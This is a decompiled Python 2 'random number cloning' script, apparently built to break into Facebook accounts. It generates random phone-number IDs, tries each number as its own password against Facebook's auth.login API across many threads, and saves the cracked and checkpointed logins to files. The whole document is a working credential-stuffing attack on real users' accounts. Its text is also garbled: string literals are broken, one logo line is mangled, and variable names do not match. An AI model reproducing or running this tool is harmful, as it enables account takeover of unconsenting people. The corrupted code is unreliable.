```
# Decompiled By Mr. NIKI
# uncompyle6 version 3.7.4
# Original written By Lx Nahim
import os, sys, time, datetime, random, hashlib, re, threading, json, urllib, cookielib, getpass
os.system('rm -rf .txt')
for n in range(50000):
  nmbr = random.randint(111111, 999999)
  sys.stdout = open('.txt', 'a')
  print nmbr
  sys.stdout.flush()
try:
  import requests
except ImportError:
  os.system('pip2 install mechanize')
try:
  import mechanize
except ImportError:
  os.system('pip2 install request')
  time.sleep(1)
  os.system('python2 .README.md')
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
br.addheaders = [('user-agent', 'Dalvik/1.6.0 (Linux; U; Android 4.4.2; NX55 Build/KOT5506)
[FBAN/FB4A;FBAV/106.0.0.26.68;FBBV/45904160;FBDM/{density=3.0,width=1080,height=1920};FBLC/it_IT;FBRV/45904160;FBCR/PosteMoL
v7a;]')]
def exb():
  print '[!] Exit Successfully '
  os.sys.exit()
def acak(b):
  w = 'ahtdzjc'
  d = "
  for i in x:
    d += '!' + w[random.randint(0, len(w) - 1)] + i
  return cetak(d)
def cetak(b):
  w = 'ahtdzjc'
  for i in w:
    j = w.index(i)
    x = x.replace('!%s' % i, '\x1b[%s;1m' % str(31 + j))
  x += '\x1b[0m'
  x = x.replace('!0', '\x1b[0m')
  sys.stdout.write(x + '\n')
def jalan(x):
  for e in x + '\n':
    sys.stdout.write(e)
    sys.stdout.flush()
    time.sleep(3.0 / 200)
def tik():
  titik = [' ','.','..','...','.','..','...',"]
  for o in titik:
    print '\r\x1b[1;96m \x1b[1;96m
                                           Loadx1b[1;96ming\\x1b[1;0m\\x1b[1;96m' + o,
    sys.stdout.flush()
    time.sleep(0.5)
##### LOGO #####
logo = """
\x1b[1;92m 888b 888
                            d8888 888 888 8888 888b d888
\x1b[1;92m 8888b 888
                            d88888 888 888 888 d8888
```

```
\x1b[1;92m 88888b 888
                                                                d88P888 888 888 888 8888b.d88888
\x1b[1;92m 888Y88b 888
                                                                d88P 888 8888888888 888 888Y88888P888
\x1b[1;92m 888 Y88b888 d88P 888 888 888 888 888 Y888P 888
\x1b[1;92m 888 Y88888 d88P 888 888 888 888 Y8P 888
\x1b[1;92m 888 Y8888 d88888888888 888 888 888 888
\x1b[1;92m 888 Y888 d88P
                                                                        888 888 888 888888 888
                                                                                                                                                  888
\x1b[1:93m
\x1b[1;92m\033[1;92m [*] Author
                                                                                         Lx NAHIM
\x1b[1;92m\033[1;92m [*] Facebook :
                                                                                            Lx NAHIM
\x1b[1;92m\033[1;92m [*] GitHub :
                                                                                         Lx NAHIM
\x1b[1;93m_
logo1 = \frac{1}{192} B0 SIM CODE \times 15[1;0m/n\times1b[1;92m [1] RI : \times1b[1;92m 80,81,82,83,84,85,86,87,88,89/n\times1b[1;93m [2] RI : \times1b[1;92m 80,81,82,83,84,85,86,87,88,89/n\times1b[1;93m 80,81,82,83,84,85,86] RI : \times1b[1;93m 80,81,82,83,84,85] RI : \times1b[1;93m 80,81,82,83,84] RI : \times1b[1;93m 80,81,82,83,84] RI : \times1b[1;93m 80,81,82,83,84] RI : \times1b[1;93m 80,81,82,83] RI : \times1b[1;93m 80,81,82] RI : \times1b[1;
GP:\x1b[1;93m 70,71,72,73,74,75,76,77,78,79\n\x1b[1;92m [3] BL:\x1b[1;92m90,91,92,93,94,95,96,97,98,99\n\x1b[1;93m [4] AT
:\x1b[1;93m 60,61,62,63,64,65,66,67,68,69\n'
back = 0
berhasil = []
cekpoint = []
oks = []
id = []
cpb = []
def menu():
    os.system('clear')
    os.system('xdg-open https://www.facebook.com/groups/cyber.420')
    jalan ('\x1b[1;92m [1] Start Random Number Cloning ')
    action()
def action():
     global cpb
    global oks
    ss = raw_input('\n\x1b[1;92m [*] Select : ')
    if ss == ":
          print '[!] Warning'
          action()
    elif ss == '1':
         tik()
          os.system('clear')
          print logo
          print logo1
          try:
               c = raw_input('\x1b[1;92m [*]CODE : ')
               k = '01'
               idlist = '.txt'
               for line in open(idlist, 'r').readlines():
                    id.append(line.strip())
          except IOError:
               print '[!] File Not Found'
              raw_input('\n[ Back ]')
              menu()
    elif ss == '0':
          exb()
          login()
    else:
          print '[!] Fill In Correctly'
          action()
    os.system('clear')
    print logo
    print
    print 47 *"\x1b[1;93m-"
    xxx = str(len(id))
                                                              TOTAL IDS:\x1b[1;93m ' + xxx)
    jalan('\x1b[1;92m
    print 47 *"\x1b[1;93m-"
    print
     def main(arg):
          user = arg
          try:
               os.mkdir('save')
          except OSError:
               pass
```

```
try:
       pass1 = user
       data = br.open('https://b-api.facebook.com/method/auth.login?
access token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=ison&sdk version=1&email=' + k + c + user +
'&locale=en US&password=' + c + pass1 + '&sdk=ios&generate session cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
       q = json.load(data)
       if 'access_token' in q:
         print '\x1b[1;96m [Lx-Temp-Lock] '+k+c+user+' | '+ pass1
         okb = open('save/CP.txt', 'a')
         okb.write(k + c + user + pass1 + '\n')
         okb.close()
         oks.append(c + user + pass1)
      elif 'www.facebook.com' in q['error_msg']:
print '\x1b[1;96m [Lx-CP] ' + k + c + user + ' | ' + pass1
         cps = open('save/CP.txt', 'a')
         cps.write(k + c + user + pass1 + '\n')
         cps.close()
         cpb.append(c + user + pass1)
       else:
         pass2 = k + c + user
         data = br.open('https://b-api.facebook.com/method/auth.login?
access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user +
'&locale=en US&password=' + c + pass1 + '&sdk=ios&generate session cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
         q = json.load(data)
         if 'access_token' in q:
           print '\x1b[1;96m [Lx-Temp-Lock] ' + k + c + user + ' | ' + pass2
           okb = open('save/OK.txt', 'a')
           okb.write(k + c + user + pass2 + '\n')
           okb.close()
           oks.append(c + user + pass2)
         elif 'www.facebook.com' in q['error_msg']:
           print \x1b[1:97m [Lx-CP]' + k + c + user + 'l' + pass2]
           cps = open('save/CP.txt', 'a')
           cps.write(k + c + user + pass2 + '\n')
           cps.close()
           cpb.append(c + user + pass2)
    except:
      pass
  p = ThreadPool(30)
  p.map(main, id)
  print 47 *"\x1b[1:93m-"
  print 'Process Has Been Completed ...'
  print 'Total OK : ' + str(len(oks))
print 'Total CP : ' + str(len(cpb))
  print 47 *"\x1b[1;93m-"
  print 'Cloned Accounts Has Been Saved : save/cloned.txt'
  jalan('Note: Cp account Will Open after 7 to 10 days')
  raw_input('\n\x1b[1;97m[\x1b[1;98melite_menu_Back\x1b[1;95m]')
  login()
if __name__ == '__main__':
  menu()
```